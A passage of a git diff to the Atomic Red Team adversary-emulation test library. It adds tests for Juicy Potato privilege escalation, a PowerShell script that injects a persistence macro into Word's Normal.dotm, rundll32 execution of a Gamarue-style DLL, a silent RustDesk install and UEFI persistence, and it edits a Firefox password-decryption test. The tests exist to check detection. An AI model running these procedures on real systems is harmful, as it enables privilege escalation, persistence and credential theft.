+if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\JuicyPotato.exe") {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\JuicyPotato.exe" "https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe"
+```
+
+
+
+
 <br/>
diff --git a/atomics/T1134.001/T1134.001.yaml b/atomics/T1134.001/T1134.001.yaml
index be3722c0..4c431615 100644
--- a/atomics/T1134.001/T1134.001.yaml
+++ b/atomics/T1134.001/T1134.001.yaml
@@ -87,3 +87,46 @@ atomic_tests:
       taskkill /f /im notepad.exe
     name: powershell
     elevation_required: true
+- name: Juicy Potato
+  auto_generated_guid: f095e373-b936-4eb4-8d22-f47ccbfbe64a
+  description: |-
+    This Atomic utilizes Juicy Potato to obtain privilege escalation. 
+    Upon successful execution of this test, a vulnerable CLSID will be used to execute a process with system permissions.
+    This tactic has been previously observed in SnapMC Ransomware, amongst numerous other campaigns. 
+    [Reference](https://blog.fox-it.com/2021/10/11/snapmc-skips-ransomware-steals-data/)
+  supported_platforms:
+  - windows
+  input_arguments:
+    potato_path:
+      description: 'Path to the JuicyPotato.exe file'
+      type: path
+      default: PathToAtomicsFolder\..\ExternalPayloads\JuicyPotato.exe 
+    listening_port:
+      description: 'COM server listen port'
+      type: integer
+      default: 7777
+    target_exe:
+      description: 'Target executable to launch with system privileges'
+      type: path
+      default: $env:windir\system32\notepad.exe
+    target_CLSID:
+      description: 'Vulnerable CLSID to impersonate privileges'
+      type: string
+      default: '{F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}'
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      JuicyPotato.exe must exist on disk
+    prereq_command: |
+      if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\JuicyPotato.exe") {exit 0} else {exit 1}
+    get_prereq_command: |
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\JuicyPotato.exe" "https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe"
+  executor:
+    command: |
+      cmd /c '#{potato_path}' -l '#{listening_port}' -t * -p '#{target_exe}' -c '#{target_CLSID}'
+    cleanup_command: |
+      get-ciminstance Win32_Process | where-object { $_.Path -eq "#{target_exe}" } | invoke-cimmethod -methodname "terminate" | out-null
+      get-ciminstance Win32_Process | where-object { $_.Path -eq "#{potato_path}" } | invoke-cimmethod -methodname "terminate" | out-null
+    name: powershell
+    elevation_required: true
diff --git a/atomics/T1137.001/T1137.001.md b/atomics/T1137.001/T1137.001.md
new file mode 100644
index 00000000..b79376b9
--- /dev/null
+++ b/atomics/T1137.001/T1137.001.md
@@ -0,0 +1,188 @@
+# T1137.001 - Office Application Startup: Office Template Macros.
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1137/001)
+<blockquote>Adversaries may abuse Microsoft Office templates to obtain persistence on a compromised system. Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates within the application are used each time an application starts. (Citation: Microsoft Change Normal Template)
+
+Office Visual Basic for Applications (VBA) macros (Citation: MSDN VBA in Office) can be inserted into the base template and used to execute code when the respective Office application starts in order to obtain persistence. Examples for both Word and Excel have been discovered and published. By default, Word has a Normal.dotm template created that can be modified to include a malicious macro. Excel does not have a template file created by default, but one can be added that will automatically be loaded.(Citation: enigma0x3 normal.dotm)(Citation: Hexacorn Office Template Macros) Shared templates may also be stored and pulled from remote locations.(Citation: GlobalDotName Jun 2019) 
+
+Word Normal.dotm location:<br>
+<code>C:\Users\&lt;username&gt;\AppData\Roaming\Microsoft\Templates\Normal.dotm</code>
+
+Excel Personal.xlsb location:<br>
+<code>C:\Users\&lt;username&gt;\AppData\Roaming\Microsoft\Excel\XLSTART\PERSONAL.XLSB</code>
+
+Adversaries may also change the location of the base template to point to their own by hijacking the application's search order, e.g. Word 2016 will first look for Normal.dotm under <code>C:\Program Files (x86)\Microsoft Office\root\Office16\</code>, or by modifying the GlobalDotName registry key. By modifying the GlobalDotName registry key an adversary can specify an arbitrary location, file name, and file extension to use for the template that will be loaded on application startup. To abuse GlobalDotName, adversaries may first need to register the template as a trusted document or place it in a trusted location.(Citation: GlobalDotName Jun 2019) 
+
+An adversary may need to enable macros to execute unrestricted depending on the system or enterprise security policy on use of macros.</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Injecting a Macro into the Word Normal.dotm Template for Persistence via PowerShell](#atomic-test-1---injecting-a-macro-into-the-word-normaldotm-template-for-persistence-via-powershell)
+
+
+<br/>
+
+## Atomic Test #1 - Injecting a Macro into the Word Normal.dotm Template for Persistence via PowerShell
+Injects a Macro in the Word default template "Normal.dotm" and makes it execute each time that Word is opened. In this test, the Macro creates a sheduled task to open Calc.exe every evening.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 940db09e-80b6-4dd0-8d4d-7764f89b47a8
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+# Registry setting to "Trust access to the VBA project object model" in Word
+$registryKey = "HKCU:Software\Microsoft\Office\16.0\Word\Security"
+$registryValue = "AccessVBOM"
+$registryData = "1"
+# The path where a flag text file will be created if Registry setting did not already exist or if it was set to 0
+$flagPath1 = "$env:USERPROFILE\AppData\Roaming\Microsoft\Templates\T1137-001_Flag1.txt"
+$flagPath2 = "$env:USERPROFILE\AppData\Roaming\Microsoft\Templates\T1137-001_Flag2.txt"
+# Get the value of the Key/Value pair
+$value = (Get-ItemProperty -Path $registryKey -Name $registryValue -ErrorAction SilentlyContinue).$registryValue
+# Logical operation to: if the value of the key/value is 1, do nothing - 
+# if the value is 0, change it to 1 and create flag1 - 
+# if it doesn't exist, create the value and flag2
+if ($value -eq "1") 
+{
+  Write-Host "The registry value '$registryValue' already exists with the required setting."
+}   
+  elseif ($value -eq "0") 
+{
+  Write-Host "The registry value was set to 0, temporarily changing to 1."
+  New-ItemProperty -Path $registryKey -Name $registryValue -Value $registryData -PropertyType DWORD -Force | Out-Null
+  echo "flag1" > $flagPath1
+} 
+  else 
+{
+  Write-Host "The registry value '$registryValue' does not exist, temporarily creating it."
+  New-ItemProperty -Path $registryKey -Name $registryValue -Value $registryData -PropertyType DWORD -Force | Out-Null
+  echo "flag2" > $flagPath2
+}
+Add-Type -AssemblyName Microsoft.Office.Interop.Word
+# Define the path of copied normal template for restoral
+$copyPath = "$env:USERPROFILE\AppData\Roaming\Microsoft\Templates\Normal1.dotm"
+# Define the path to the normal template
+$docPath = "$env:USERPROFILE\AppData\Roaming\Microsoft\Templates\Normal.dotm"
+# Create copy of orginal template for restoral
+Copy-Item -Path $docPath -Destination $copyPath -Force
+# VBA code to be insterted as a Macro
+# Will create a scheduled task to open the Calculator at 8:04pm daily
+$vbaCode = @"
+  Sub AutoExec()
+  Dim applicationPath As String
+  Dim taskName As String
+  Dim runTime As String
+  Dim schTasksCmd As String
+  applicationPath = "C:\Windows\System32\calc.exe"
+  taskName = "OpenCalcTask"
+  runTime = "20:04"
+  schTasksCmd = "schtasks /create /tn """ & taskName & """ /tr """ & applicationPath & """ /sc daily /st " & runTime & " /f"
+  Shell "cmd.exe /c " & schTasksCmd, vbNormalFocus
+  End Sub
+"@
+# Create a new instance of Word.Application
+$word = New-Object -ComObject Word.Application
+# Keep the Word application hidden
+$word.Visible = $false
+# Open the document
+$document = $word.Documents.Open($docPath)
+# Access the VBA project of the document
+$vbaProject = $document.VBProject
+# Add a new module to the VBA project
+$newModule = $vbaProject.VBComponents.Add(1) # 1 = vbext_ct_StdModule
+# Add the VBA code to the new module
+$newModule.CodeModule.AddFromString($vbaCode)
+# Run the Macro
+$word.run("AutoExec")
+# Save and close the document
+$document.SaveAs($docPath)
+$document.Close()
+# Quit Word
+$word.Quit()
+# Release COM objects
+[System.Runtime.InteropServices.Marshal]::ReleaseComObject($document) | Out-Null
+[System.Runtime.InteropServices.Marshal]::ReleaseComObject($word) | Out-Null
+[System.Runtime.InteropServices.Marshal]::ReleaseComObject($vbaProject) | Out-Null
+[System.Runtime.InteropServices.Marshal]::ReleaseComObject($newModule) | Out-Null
+```
+
+#### Cleanup Commands:
+```powershell
+# Registry setting to "Trust access to the VBA project object model" in Word
+$registryKey = "HKCU:Software\Microsoft\Office\16.0\Word\Security"
+$registryValue = "AccessVBOM"
+$registryData1 = "1"
+$registryData0 = "0"
+# Defines the path each flag file created depending on the original registry state
+$flagPath1 = "$env:USERPROFILE\AppData\Roaming\Microsoft\Templates\T1137-001_Flag1.txt"
+$flagPath2 = "$env:USERPROFILE\AppData\Roaming\Microsoft\Templates\T1137-001_Flag2.txt"
+# Define the path of copied normal template for restoral
+$copyPath = "$env:USERPROFILE\AppData\Roaming\Microsoft\Templates\Normal1.dotm"
+# Define the path to the normal template
+$docPath = "$env:USERPROFILE\AppData\Roaming\Microsoft\Templates\Normal.dotm"
+# Delete the scheduled task created by the Macro
+schtasks /Delete /TN "OpenCalcTask" /F | Out-Null
+#Restore the orginal template if the backup copy exists
+if (Test-Path $copyPath)
+{
+  #Delete the injected template
+  Remove-Item -Force $docPath -ErrorAction SilentlyContinue
+  # Restore the original template
+  Rename-Item -Force -Path $copyPath -NewName $docPath -ErrorAction SilentlyContinue
+  Write-Host "The original template has been restored"
+}
+  else
+{
+  Write-Host "The original template is present"
+}
+#Restore the original state of the registry key
+if (Test-Path $flagPath1) 
+{
+  # The value was originally 0, set back to 0
+  New-ItemProperty -Path $registryKey -Name $registryValue -Value $registryData0 -PropertyType DWORD -Force | Out-Null
+  Remove-Item -Force $flagPath1 -ErrorAction SilentlyContinue
+  Write-Host "The original registry state has been restored"
+} 
+  elseif (Test-Path $flagPath2)
+{
+  #The value did not previously exist, delete the value
+  Remove-ItemProperty -Path $registryKey -Name $registryValue | Out-Null
+  Remove-Item -Force $flagPath2 -ErrorAction SilentlyContinue | Out-Null
+  Write-Host "The original registry state has been restored"
+}
+  else 
+{
+  # The value was already 1, do nothing
+  Write-Host "The value $registryValue already existed in $registryKey."
+}
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Microsoft Word must be installed
+##### Check Prereq Commands:
+```powershell
+try {
+  New-Object -COMObject "Word.Application" | Out-Null
+  Stop-Process -Name "winword"
+  exit 0
+} catch { exit 1 }
+```
+##### Get Prereq Commands:
+```powershell
+Write-Host "You will need to install Microsoft Word manually to meet this requirement"
+```
+
+
+
+
+<br/>
diff --git a/atomics/T1137.001/T1137.001.yaml b/atomics/T1137.001/T1137.001.yaml
new file mode 100644
index 00000000..1f6b599e
--- /dev/null
+++ b/atomics/T1137.001/T1137.001.yaml
@@ -0,0 +1,146 @@
+attack_technique: T1137.001
+display_name: 'Office Application Startup: Office Template Macros.'
+atomic_tests:
+- name: Injecting a Macro into the Word Normal.dotm Template for Persistence via PowerShell
+  auto_generated_guid: 940db09e-80b6-4dd0-8d4d-7764f89b47a8
+  description: |
+    Injects a Macro in the Word default template "Normal.dotm" and makes it execute each time that Word is opened. In this test, the Macro creates a sheduled task to open Calc.exe every evening.
+  supported_platforms:
+    - windows
+  dependencies:
+  - description: |
+      Microsoft Word must be installed
+    prereq_command: |
+      try {
+        New-Object -COMObject "Word.Application" | Out-Null
+        Stop-Process -Name "winword"
+        exit 0
+      } catch { exit 1 }
+    get_prereq_command: |
+      Write-Host "You will need to install Microsoft Word manually to meet this requirement"
+  executor:
+    name: powershell
+    elevation_required: true
+    command: |
+      # Registry setting to "Trust access to the VBA project object model" in Word
+      $registryKey = "HKCU:Software\Microsoft\Office\16.0\Word\Security"
+      $registryValue = "AccessVBOM"
+      $registryData = "1"
+      # The path where a flag text file will be created if Registry setting did not already exist or if it was set to 0
+      $flagPath1 = "$env:USERPROFILE\AppData\Roaming\Microsoft\Templates\T1137-001_Flag1.txt"
+      $flagPath2 = "$env:USERPROFILE\AppData\Roaming\Microsoft\Templates\T1137-001_Flag2.txt"
+      # Get the value of the Key/Value pair
+      $value = (Get-ItemProperty -Path $registryKey -Name $registryValue -ErrorAction SilentlyContinue).$registryValue
+      # Logical operation to: if the value of the key/value is 1, do nothing - 
+      # if the value is 0, change it to 1 and create flag1 - 
+      # if it doesn't exist, create the value and flag2
+      if ($value -eq "1") 
+      {
+        Write-Host "The registry value '$registryValue' already exists with the required setting."
+      }   
+        elseif ($value -eq "0") 
+      {
+        Write-Host "The registry value was set to 0, temporarily changing to 1."
+        New-ItemProperty -Path $registryKey -Name $registryValue -Value $registryData -PropertyType DWORD -Force | Out-Null
+        echo "flag1" > $flagPath1
+      } 
+        else 
+      {
+        Write-Host "The registry value '$registryValue' does not exist, temporarily creating it."
+        New-ItemProperty -Path $registryKey -Name $registryValue -Value $registryData -PropertyType DWORD -Force | Out-Null
+        echo "flag2" > $flagPath2
+      }
+      Add-Type -AssemblyName Microsoft.Office.Interop.Word
+      # Define the path of copied normal template for restoral
+      $copyPath = "$env:USERPROFILE\AppData\Roaming\Microsoft\Templates\Normal1.dotm"
+      # Define the path to the normal template
+      $docPath = "$env:USERPROFILE\AppData\Roaming\Microsoft\Templates\Normal.dotm"
+      # Create copy of orginal template for restoral
+      Copy-Item -Path $docPath -Destination $copyPath -Force
+      # VBA code to be insterted as a Macro
+      # Will create a scheduled task to open the Calculator at 8:04pm daily
+      $vbaCode = @"
+        Sub AutoExec()
+        Dim applicationPath As String
+        Dim taskName As String
+        Dim runTime As String
+        Dim schTasksCmd As String
+        applicationPath = "C:\Windows\System32\calc.exe"
+        taskName = "OpenCalcTask"
+        runTime = "20:04"
+        schTasksCmd = "schtasks /create /tn """ & taskName & """ /tr """ & applicationPath & """ /sc daily /st " & runTime & " /f"
+        Shell "cmd.exe /c " & schTasksCmd, vbNormalFocus
+        End Sub
+      "@
+      # Create a new instance of Word.Application
+      $word = New-Object -ComObject Word.Application
+      # Keep the Word application hidden
+      $word.Visible = $false
+      # Open the document
+      $document = $word.Documents.Open($docPath)
+      # Access the VBA project of the document
+      $vbaProject = $document.VBProject
+      # Add a new module to the VBA project
+      $newModule = $vbaProject.VBComponents.Add(1) # 1 = vbext_ct_StdModule
+      # Add the VBA code to the new module
+      $newModule.CodeModule.AddFromString($vbaCode)
+      # Run the Macro
+      $word.run("AutoExec")
+      # Save and close the document
+      $document.SaveAs($docPath)
+      $document.Close()
+      # Quit Word
+      $word.Quit()
+      # Release COM objects
+      [System.Runtime.InteropServices.Marshal]::ReleaseComObject($document) | Out-Null
+      [System.Runtime.InteropServices.Marshal]::ReleaseComObject($word) | Out-Null
+      [System.Runtime.InteropServices.Marshal]::ReleaseComObject($vbaProject) | Out-Null
+      [System.Runtime.InteropServices.Marshal]::ReleaseComObject($newModule) | Out-Null
+    cleanup_command: |
+      # Registry setting to "Trust access to the VBA project object model" in Word
+      $registryKey = "HKCU:Software\Microsoft\Office\16.0\Word\Security"
+      $registryValue = "AccessVBOM"
+      $registryData1 = "1"
+      $registryData0 = "0"
+      # Defines the path each flag file created depending on the original registry state
+      $flagPath1 = "$env:USERPROFILE\AppData\Roaming\Microsoft\Templates\T1137-001_Flag1.txt"
+      $flagPath2 = "$env:USERPROFILE\AppData\Roaming\Microsoft\Templates\T1137-001_Flag2.txt"
+      # Define the path of copied normal template for restoral
+      $copyPath = "$env:USERPROFILE\AppData\Roaming\Microsoft\Templates\Normal1.dotm"
+      # Define the path to the normal template
+      $docPath = "$env:USERPROFILE\AppData\Roaming\Microsoft\Templates\Normal.dotm"
+      # Delete the scheduled task created by the Macro
+      schtasks /Delete /TN "OpenCalcTask" /F | Out-Null
+      #Restore the orginal template if the backup copy exists
+      if (Test-Path $copyPath)
+      {
+        #Delete the injected template
+        Remove-Item -Force $docPath -ErrorAction SilentlyContinue
+        # Restore the original template
+        Rename-Item -Force -Path $copyPath -NewName $docPath -ErrorAction SilentlyContinue
+        Write-Host "The original template has been restored"
+      }
+        else
+      {
+        Write-Host "The original template is present"
+      }
+      #Restore the original state of the registry key
+      if (Test-Path $flagPath1) 
+      {
+        # The value was originally 0, set back to 0
+        New-ItemProperty -Path $registryKey -Name $registryValue -Value $registryData0 -PropertyType DWORD -Force | Out-Null
+        Remove-Item -Force $flagPath1 -ErrorAction SilentlyContinue
+        Write-Host "The original registry state has been restored"
+      } 
+        elseif (Test-Path $flagPath2)
+      {
+        #The value did not previously exist, delete the value
+        Remove-ItemProperty -Path $registryKey -Name $registryValue | Out-Null
+        Remove-Item -Force $flagPath2 -ErrorAction SilentlyContinue | Out-Null
+        Write-Host "The original registry state has been restored"
+      }
+        else 
+      {
+        # The value was already 1, do nothing
+        Write-Host "The value $registryValue already existed in $registryKey."
+      }
diff --git a/atomics/T1218.011/T1218.011.md b/atomics/T1218.011/T1218.011.md
index 99d236c7..416e9b73 100644
--- a/atomics/T1218.011/T1218.011.md
+++ b/atomics/T1218.011/T1218.011.md
@@ -38,6 +38,8 @@ Additionally, adversaries may use [Masquerading](https://attack.mitre.org/techni
 
 - [Atomic Test #13 - Rundll32 with desk.cpl](#atomic-test-13---rundll32-with-deskcpl)
 
+- [Atomic Test #14 - Running DLL with .init extension and function](#atomic-test-14---running-dll-with-init-extension-and-function)
+
 
 <br/>
 
@@ -590,4 +592,52 @@ del not_an_scr.scr
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #14 - Running DLL with .init extension and function
+This test, based on common Gamarue tradecraft, consists of a DLL file with a .init extension being run by rundll32.exe. When this DLL file's 'krnl' function is called, it launches a Windows pop-up.
+DLL created with the AtomicTestHarnesses Portable Executable Builder script.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 2d5029f0-ae20-446f-8811-e7511b58e8b6
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| dll_file | The DLL file to be called | string | PathToAtomicsFolder&#92;T1218.011&#92;bin&#92;_WT.init|
+| dll_url | The URL to the DLL file that must be downloaded | url | https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/bin/_WT.init|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+rundll32.exe #{dll_file},krnl
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: The DLL file to be called must exist at the specified location (#{dll_file})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path "#{dll_file}") {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory (split-path "#{dll_file}") -ErrorAction ignore | Out-Null
+Invoke-WebRequest "#{dll_url}" -OutFile "#{dll_file}"
+```
+
+
+
+
 <br/>
diff --git a/atomics/T1218.011/T1218.011.yaml b/atomics/T1218.011/T1218.011.yaml
index 53d74493..175f7815 100644
--- a/atomics/T1218.011/T1218.011.yaml
+++ b/atomics/T1218.011/T1218.011.yaml
@@ -295,3 +295,31 @@ atomic_tests:
       copy #{exe_to_launch} not_an_scr.scr
       rundll32.exe desk.cpl,InstallScreenSaver not_an_scr.scr
     cleanup_command: del not_an_scr.scr
+
+- name: Running DLL with .init extension and function
+  auto_generated_guid: 2d5029f0-ae20-446f-8811-e7511b58e8b6
+  description: |
+    This test, based on common Gamarue tradecraft, consists of a DLL file with a .init extension being run by rundll32.exe. When this DLL file's 'krnl' function is called, it launches a Windows pop-up.
+    DLL created with the AtomicTestHarnesses Portable Executable Builder script.
+  supported_platforms:
+  - windows
+  input_arguments:
+    dll_file:
+      description: The DLL file to be called
+      type: string
+      default: PathToAtomicsFolder\T1218.011\bin\_WT.init
+    dll_url:
+      description: The URL to the DLL file that must be downloaded
+      type: url
+      default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/bin/_WT.init
+  dependency_executor_name: powershell
+  dependencies:
+  - description: The DLL file to be called must exist at the specified location (#{dll_file})
+    prereq_command: if (Test-Path "#{dll_file}") {exit 0} else {exit 1}
+    get_prereq_command: |
+      New-Item -Type Directory (split-path "#{dll_file}") -ErrorAction ignore | Out-Null
+      Invoke-WebRequest "#{dll_url}" -OutFile "#{dll_file}"
+  executor:
+    command: |
+      rundll32.exe #{dll_file},krnl
+    name: command_prompt
diff --git a/atomics/T1218.011/bin/_WT.init b/atomics/T1218.011/bin/_WT.init
new file mode 100644
index 00000000..19114b69
Binary files /dev/null and b/atomics/T1218.011/bin/_WT.init differ
diff --git a/atomics/T1219/T1219.md b/atomics/T1219/T1219.md
index 88bd102d..191ab847 100644
--- a/atomics/T1219/T1219.md
+++ b/atomics/T1219/T1219.md
@@ -32,6 +32,8 @@ Installation of many remote access software may also include persistence (e.g.,
 
 - [Atomic Test #11 - MSP360 Connect Execution](#atomic-test-11---msp360-connect-execution)
 
+- [Atomic Test #12 - RustDesk Files Detected Test on Windows](#atomic-test-12---rustdesk-files-detected-test-on-windows)
+
 
 <br/>
 
@@ -528,4 +530,40 @@ start-process "PathToAtomicsFolder\..\ExternalPayloads\msp360connect.exe" /S
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #12 - RustDesk Files Detected Test on Windows
+An adversary may attempt to trick the user into downloading RustDesk and use this to maintain access to the machine. 
+Download of RustDesk installer will be at the destination location when successfully executed.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** f1641ba9-919a-4323-b74f-33372333bf0e
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$file = Join-Path $env:USERPROFILE "Desktop\rustdesk-1.2.3-1-x86_64.exe"
+Invoke-WebRequest  -OutFile $file https://github.com/rustdesk/rustdesk/releases/download/1.2.3-1/rustdesk-1.2.3-1-x86_64.exe
+Start-Process -FilePath $file "/S"
+```
+
+#### Cleanup Commands:
+```powershell
+$file = Join-Path $env:USERPROFILE "Desktop\rustdesk-1.2.3-1-x86_64.exe"
+Remove-Item $file1 -ErrorAction Ignore
+```
+
+
+
+
+
 <br/>
diff --git a/atomics/T1219/T1219.yaml b/atomics/T1219/T1219.yaml
index e6c15d22..6fdad837 100644
--- a/atomics/T1219/T1219.yaml
+++ b/atomics/T1219/T1219.yaml
@@ -265,3 +265,19 @@ atomic_tests:
       Stop-Process -Name "Connect" -force -erroraction silentlycontinue
     name: powershell
     elevation_required: true
+- name: RustDesk Files Detected Test on Windows
+  auto_generated_guid: f1641ba9-919a-4323-b74f-33372333bf0e
+  description: |
+    An adversary may attempt to trick the user into downloading RustDesk and use this to maintain access to the machine. 
+    Download of RustDesk installer will be at the destination location when successfully executed.
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      $file = Join-Path $env:USERPROFILE "Desktop\rustdesk-1.2.3-1-x86_64.exe"
+      Invoke-WebRequest  -OutFile $file https://github.com/rustdesk/rustdesk/releases/download/1.2.3-1/rustdesk-1.2.3-1-x86_64.exe
+      Start-Process -FilePath $file "/S"
+    cleanup_command: |-
+      $file = Join-Path $env:USERPROFILE "Desktop\rustdesk-1.2.3-1-x86_64.exe"
+      Remove-Item $file1 -ErrorAction Ignore
+    name: powershell
diff --git a/atomics/T1542.001/T1542.001.md b/atomics/T1542.001/T1542.001.md
new file mode 100644
index 00000000..0e95e9e9
--- /dev/null
+++ b/atomics/T1542.001/T1542.001.md
@@ -0,0 +1,48 @@
+# T1542.001 - Pre-OS Boot: System Firmware
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1542/001)
+<blockquote>Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)
+
+System firmware like BIOS and (U)EFI underly the functionality of a computer and may be modified by an adversary to perform or assist in malicious activity. Capabilities exist to overwrite the system firmware, which may give sophisticated adversaries a means to install malicious firmware updates as a means of persistence on a system that may be difficult to detect.</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - UEFI Persistence via Wpbbin.exe File Creation](#atomic-test-1---uefi-persistence-via-wpbbinexe-file-creation)
+
+
+<br/>
+
+## Atomic Test #1 - UEFI Persistence via Wpbbin.exe File Creation
+Creates Wpbbin.exe in %systemroot%. This technique can be used for UEFI-based pre-OS boot persistence mechanisms.
+- https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c
+- http://download.microsoft.com/download/8/a/2/8a2fb72d-9b96-4e2d-a559-4a27cf905a80/windows-platform-binary-table.docx
+- https://github.com/tandasat/WPBT-Builder
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** b8a49f03-e3c4-40f2-b7bb-9e8f8fdddbf1
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+echo "Creating %systemroot%\wpbbin.exe"      
+New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
+```
+
+#### Cleanup Commands:
+```powershell
+echo "Removing %systemroot%\wpbbin.exe" 
+Remove-Item -Path "$env:SystemRoot\System32\wpbbin.exe"
+```
+
+
+
+
+
+<br/>
diff --git a/atomics/T1542.001/T1542.001.yaml b/atomics/T1542.001/T1542.001.yaml
new file mode 100644
index 00000000..4f0a334a
--- /dev/null
+++ b/atomics/T1542.001/T1542.001.yaml
@@ -0,0 +1,21 @@
+attack_technique: T1542.001
+display_name: "Pre-OS Boot: System Firmware"
+atomic_tests:
+- name: UEFI Persistence via Wpbbin.exe File Creation
+  auto_generated_guid: b8a49f03-e3c4-40f2-b7bb-9e8f8fdddbf1
+  description: |
+    Creates Wpbbin.exe in %systemroot%. This technique can be used for UEFI-based pre-OS boot persistence mechanisms.
+    - https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c
+    - http://download.microsoft.com/download/8/a/2/8a2fb72d-9b96-4e2d-a559-4a27cf905a80/windows-platform-binary-table.docx
+    - https://github.com/tandasat/WPBT-Builder
+  supported_platforms:
+  - windows
+  executor:
+    name: powershell
+    command: |
+      echo "Creating %systemroot%\wpbbin.exe"      
+      New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
+    cleanup_command: |
+      echo "Removing %systemroot%\wpbbin.exe" 
+      Remove-Item -Path "$env:SystemRoot\System32\wpbbin.exe"
+    elevation_required: true
diff --git a/atomics/T1555.003/T1555.003.md b/atomics/T1555.003/T1555.003.md
index aad2b306..7acddb9e 100644
--- a/atomics/T1555.003/T1555.003.md
+++ b/atomics/T1555.003/T1555.003.md
@@ -420,7 +420,9 @@ Stop-Process -Name msedge
 
 ## Atomic Test #8 - Decrypt Mozilla Passwords with Firepwd.py
 Firepwd.py is a script that can decrypt Mozilla (Thunderbird, Firefox) passwords.
-Upon successful execution, the decrypted credentials will be output to a text file, as well as displayed on screen.
+Upon successful execution, the decrypted credentials will be output to a text file, as well as displayed on screen. 
+
+Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution.
 
 **Supported Platforms:** Windows
 
@@ -434,10 +436,11 @@ Upon successful execution, the decrypted credentials will be output to a text fi
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| Firepwd_Path | Filepath for Firepwd.py | string | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;Firepwd.py|
+| Firepwd_Path | Filepath for Firepwd.py | string | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;venv_t1555.004&#92;Scripts&#92;Firepwd.py|
 | Out_Filepath | Filepath to output results to | string | $env:temp&#92;T1555.003Test8.txt|
 | VS_CMD_Path | Filepath to Visual Studio Build Tools Command prompt | string | C:&#92;Program Files (x86)&#92;Microsoft Visual Studio&#92;2022&#92;BuildTools&#92;VC&#92;Auxiliary&#92;Build&#92;vcvars64.bat|
 | Python_Path | Filepath to python | string | C:&#92;Program Files&#92;Python310&#92;python.exe|
+| venv_path | Path to the folder for the tactics venv | string | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;venv_t1555.004|
 
 
 #### Attack Commands: Run with `powershell`! 
@@ -445,7 +448,7 @@ Upon successful execution, the decrypted credentials will be output to a text fi
 
 ```powershell
 $PasswordDBLocation = get-childitem -path "$env:appdata\Mozilla\Firefox\Profiles\*.default-release\"
-cmd /c #{Firepwd_Path} -d $PasswordDBLocation > #{Out_Filepath}
+cmd /c #{venv_path}\Scripts\python.exe #{Firepwd_Path} -d $PasswordDBLocation > #{Out_Filepath}
 cat #{Out_Filepath}
 ```
 
@@ -457,16 +460,6 @@ Remove-Item -Path "#{Out_Filepath}" -erroraction silentlycontinue
 
 
 #### Dependencies:  Run with `powershell`!
-##### Description: Firepwd must exist at #{Firepwd_Path}
-##### Check Prereq Commands:
-```powershell
-if (Test-Path "#{Firepwd_Path}") {exit 0} else {exit 1}
-```
-##### Get Prereq Commands:
-```powershell
-New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
-Invoke-WebRequest "https://raw.githubusercontent.com/lclevy/firepwd/167eabf3b88d5a7ba8b8bc427283f827b6885982/firepwd.py" -outfile "#{Firepwd_Path}"
-```
 ##### Description: Firefox profile directory must be present
 ##### Check Prereq Commands:
 ```powershell
@@ -504,41 +497,42 @@ New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction
 invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
